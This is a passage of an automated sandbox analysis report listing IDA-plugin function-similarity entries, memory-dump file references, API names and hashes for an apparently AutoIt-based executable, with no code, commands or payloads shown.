                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BF8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442261072.00007FF6B5C0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442299612.00007FF6B5C14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_19_2_7ff6b5b20000_dqcwif.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ClassMessageNameSend
                                                                                                          • String ID: ComboBox$ListBox
                                                                                                          • API String ID: 3678867486-1403004172
                                                                                                          • Opcode ID: 2b6fed8ad632b1f274e203d646578af3038472905804e24f6343927dca18ccae
                                                                                                          • Instruction ID: 2981fa35c9a44aea7d58a083ab30ceda9ac4c8e0fd20f7a33bb15de22563acb1
                                                                                                          • Opcode Fuzzy Hash: 2b6fed8ad632b1f274e203d646578af3038472905804e24f6343927dca18ccae
                                                                                                          • Instruction Fuzzy Hash: 0A11B662B0C68291FB10DB14E4611FA6360FF8AB80F445031D78C8768FDF2CDA09CB10
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000013.00000002.2440891490.00007FF6B5B21000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6B5B20000, based on PE: true
                                                                                                          • Associated: 00000013.00000002.2440806589.00007FF6B5B20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BD5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BF8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442261072.00007FF6B5C0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442299612.00007FF6B5C14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_19_2_7ff6b5b20000_dqcwif.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Internet$OpenOption
                                                                                                          • String ID: <local>
                                                                                                          • API String ID: 942729171-4266983199
                                                                                                          • Opcode ID: 8fc137a1ef2bd80f32763a254e30885bf035247cf28a45f4fd96fdfcbffecfa0
                                                                                                          • Instruction ID: cc6636210ae44878ac48faabf33e3b97b05c718a6750cd65ad9a4f28a457cba8
                                                                                                          • Opcode Fuzzy Hash: 8fc137a1ef2bd80f32763a254e30885bf035247cf28a45f4fd96fdfcbffecfa0
                                                                                                          • Instruction Fuzzy Hash: 4B115836A18A4182F7518B19E5147FD6261E786F48FA44035DB4D866DDDF3DDC86C700
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000013.00000002.2440891490.00007FF6B5B21000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6B5B20000, based on PE: true
                                                                                                          • Associated: 00000013.00000002.2440806589.00007FF6B5B20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BD5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BF8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442261072.00007FF6B5C0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442299612.00007FF6B5C14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_19_2_7ff6b5b20000_dqcwif.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CloseCreateHandleProcess
                                                                                                          • String ID:
                                                                                                          • API String ID: 3712363035-3916222277
                                                                                                          • Opcode ID: 7b42f129ca5b2bc2214f050bb36978d190a1a5278d42b1070c82c133f3bdff27
                                                                                                          • Instruction ID: 3f8ac3a4d543744836e22c952f8a6e39a5ae4d266fd7484bf1113df14b43cd69
                                                                                                          • Opcode Fuzzy Hash: 7b42f129ca5b2bc2214f050bb36978d190a1a5278d42b1070c82c133f3bdff27
                                                                                                          • Instruction Fuzzy Hash: D6117332A0875186E710CF2AF81459A76F2FB85F84F444139DB4D87A6ACF3DD890CB00
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000013.00000002.2440891490.00007FF6B5B21000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6B5B20000, based on PE: true
                                                                                                          • Associated: 00000013.00000002.2440806589.00007FF6B5B20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BD5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BF8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442261072.00007FF6B5C0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442299612.00007FF6B5C14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_19_2_7ff6b5b20000_dqcwif.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ClassMessageNameSend
                                                                                                          • String ID: ComboBox$ListBox
                                                                                                          • API String ID: 3678867486-1403004172
                                                                                                          • Opcode ID: 2fa39eb79566fbbf5ef709d97066772d08e715fc924eaba82c6fe28b878daa18
                                                                                                          • Instruction ID: 54ee3c6f6853a9309f3fa0fd33b6e6cbb1090dc205094ce9b7f51e113cdcf04e
                                                                                                          • Opcode Fuzzy Hash: 2fa39eb79566fbbf5ef709d97066772d08e715fc924eaba82c6fe28b878daa18
                                                                                                          • Instruction Fuzzy Hash: 01016122A1C94292FA20D718E5B11F95360EF9AB94F405131E78D87A9FDE6CEA08CB11
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000013.00000002.2440891490.00007FF6B5B21000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6B5B20000, based on PE: true
                                                                                                          • Associated: 00000013.00000002.2440806589.00007FF6B5B20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BD5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BF8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442261072.00007FF6B5C0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442299612.00007FF6B5C14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_19_2_7ff6b5b20000_dqcwif.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _ctrlfp_handle_error_raise_exc
                                                                                                          • String ID: !$tan
                                                                                                          • API String ID: 3384550415-2428968949
                                                                                                          • Opcode ID: 2d553fd115d33d3a807ffc94b8434da97490ee8f564b276a29f6e1ed56bbbb66
                                                                                                          • Instruction ID: 06f92849673192aa0e90bebfbac5ec6a122d5232d70cf624c94e9b0bbd0c426c
                                                                                                          • Opcode Fuzzy Hash: 2d553fd115d33d3a807ffc94b8434da97490ee8f564b276a29f6e1ed56bbbb66
                                                                                                          • Instruction Fuzzy Hash: 1D018471A28B8541DA15CF16A42037AA162FB9ABD4F105335EA5E0BB89EF7CD5508B00
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000013.00000002.2440891490.00007FF6B5B21000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6B5B20000, based on PE: true
                                                                                                          • Associated: 00000013.00000002.2440806589.00007FF6B5B20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BD5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BF8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442261072.00007FF6B5C0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442299612.00007FF6B5C14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_19_2_7ff6b5b20000_dqcwif.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _ctrlfp_handle_error_raise_exc
                                                                                                          • String ID: !$sin
                                                                                                          • API String ID: 3384550415-1565623160
                                                                                                          • Opcode ID: 9c5650ba25f23863d1585264c289844e213b1bc1e7bffeede2023515f4cd1262
                                                                                                          • Instruction ID: 6bd378f71def43940d5911755403240993a370fdca34d6f416b3c33ee2ba9b30
                                                                                                          • Opcode Fuzzy Hash: 9c5650ba25f23863d1585264c289844e213b1bc1e7bffeede2023515f4cd1262
                                                                                                          • Instruction Fuzzy Hash: 4B01B571E28BC541DA15CF26942037AE262BF9BBD4F104335EA5A0AB8DEF6DD4404B00
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000013.00000002.2440891490.00007FF6B5B21000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6B5B20000, based on PE: true
                                                                                                          • Associated: 00000013.00000002.2440806589.00007FF6B5B20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BD5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BF8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442261072.00007FF6B5C0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442299612.00007FF6B5C14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_19_2_7ff6b5b20000_dqcwif.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _ctrlfp_handle_error_raise_exc
                                                                                                          • String ID: !$cos
                                                                                                          • API String ID: 3384550415-1949035351
                                                                                                          • Opcode ID: 59a2c881f09cdb696690f699cc12801b637b051dbcc35695dacf0c08331e8fc0
                                                                                                          • Instruction ID: ae07e90a691840ca771a941890623f7ba17db0bdced4980219b215c17c6aaea3
                                                                                                          • Opcode Fuzzy Hash: 59a2c881f09cdb696690f699cc12801b637b051dbcc35695dacf0c08331e8fc0
                                                                                                          • Instruction Fuzzy Hash: BC01B571E29B8981DA15CF26A42037AA162BF9BBD4F104335EA5A0AB8DEF7DD4504B00
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000013.00000002.2440891490.00007FF6B5B21000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6B5B20000, based on PE: true
                                                                                                          • Associated: 00000013.00000002.2440806589.00007FF6B5B20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BD5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BF8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442261072.00007FF6B5C0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442299612.00007FF6B5C14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_19_2_7ff6b5b20000_dqcwif.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _handle_error
                                                                                                          • String ID: "$exp
                                                                                                          • API String ID: 1757819995-2878093337
                                                                                                          • Opcode ID: 1dd5b4e450707440dd9d18b5c78d2e187119c4904f0596c8cb375bf303972248
                                                                                                          • Instruction ID: 3998e17650f530b86d2ef299ca4602b9b91d420328226c55e80e1a68c0e1d8e9
                                                                                                          • Opcode Fuzzy Hash: 1dd5b4e450707440dd9d18b5c78d2e187119c4904f0596c8cb375bf303972248
                                                                                                          • Instruction Fuzzy Hash: 8401A176D29B8886E221CF28D0492AABBB0FFEA744F205315E7451AA65DB7DD4819F00
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000013.00000002.2440891490.00007FF6B5B21000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6B5B20000, based on PE: true
                                                                                                          • Associated: 00000013.00000002.2440806589.00007FF6B5B20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BD5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BF8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442261072.00007FF6B5C0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442299612.00007FF6B5C14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_19_2_7ff6b5b20000_dqcwif.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Message
                                                                                                          • String ID: AutoIt$Error allocating memory.
                                                                                                          • API String ID: 2030045667-4017498283
                                                                                                          • Opcode ID: f1d0e9594dbd70012e5d94681f3f0c05ed3699d04d903328bffb77d45b4c69ef
                                                                                                          • Instruction ID: 7888730480efdc609ef7e01564c1c02ec76a03b1f0377a853f92a666c5e4b9be
                                                                                                          • Opcode Fuzzy Hash: f1d0e9594dbd70012e5d94681f3f0c05ed3699d04d903328bffb77d45b4c69ef
                                                                                                          • Instruction Fuzzy Hash: 24F0A020B1834A42EB286759B1763F92251AF4AB80F545435DB0D8BBDFCDADD8D68700
                                                                                                          APIs
                                                                                                          • try_get_function.LIBVCRUNTIME ref: 00007FF6B5B475E9
                                                                                                          • TlsSetValue.KERNEL32(?,?,?,00007FF6B5B47241,?,?,?,?,00007FF6B5B4660C,?,?,?,?,00007FF6B5B44CD3), ref: 00007FF6B5B47600
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000013.00000002.2440891490.00007FF6B5B21000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6B5B20000, based on PE: true
                                                                                                          • Associated: 00000013.00000002.2440806589.00007FF6B5B20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BD5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BF8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442261072.00007FF6B5C0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442299612.00007FF6B5C14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_19_2_7ff6b5b20000_dqcwif.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Valuetry_get_function
                                                                                                          • String ID: FlsSetValue
                                                                                                          • API String ID: 738293619-3750699315
                                                                                                          • Opcode ID: 5ef202829eb63c082d646b2b3c40b210c8e2726f911b0f602dea3cecf0443926
                                                                                                          • Instruction ID: 222e9c4d5acb71b20cbc9f89db7e6d097444724639762021485d7a585fbadaec
                                                                                                          • Opcode Fuzzy Hash: 5ef202829eb63c082d646b2b3c40b210c8e2726f911b0f602dea3cecf0443926
                                                                                                          • Instruction Fuzzy Hash: EDE06561A0854282EB554F5DE4604F42362AF49F91F585035DB0D862DFCE7CEC49C600
                                                                                                          APIs
                                                                                                          • std::bad_alloc::bad_alloc.LIBCMT ref: 00007FF6B5B45629
                                                                                                          • _CxxThrowException.LIBVCRUNTIME ref: 00007FF6B5B4563A
                                                                                                            • Part of subcall function 00007FF6B5B47018: RtlPcToFileHeader.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF6B5B4563F), ref: 00007FF6B5B4708D
                                                                                                            • Part of subcall function 00007FF6B5B47018: RaiseException.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00007FF6B5B4563F), ref: 00007FF6B5B470BF
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000013.00000002.2440891490.00007FF6B5B21000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6B5B20000, based on PE: true
                                                                                                          • Associated: 00000013.00000002.2440806589.00007FF6B5B20000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BD5000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2441812857.00007FF6B5BF8000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442261072.00007FF6B5C0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          • Associated: 00000013.00000002.2442299612.00007FF6B5C14000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_19_2_7ff6b5b20000_dqcwif.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Exception$FileHeaderRaiseThrowstd::bad_alloc::bad_alloc
                                                                                                          • String ID: Unknown exception
                                                                                                          • API String ID: 3561508498-410509341
                                                                                                          • Opcode ID: 9460797eaada1e9b880d8cc7196a2a9f4627ae69dcab396aeadb3e3bc5cc4094
                                                                                                          • Instruction ID: ae630d2f9e1e2f0c07ce8513c0dfe43d27686c6b6b8203e49713fc2f9108abe1
                                                                                                          • Opcode Fuzzy Hash: 9460797eaada1e9b880d8cc7196a2a9f4627ae69dcab396aeadb3e3bc5cc4094
                                                                                                          • Instruction Fuzzy Hash: BFD0122261498691DE20EB08D4543E86330F741708F904431D34C815BADF6CDE4AD700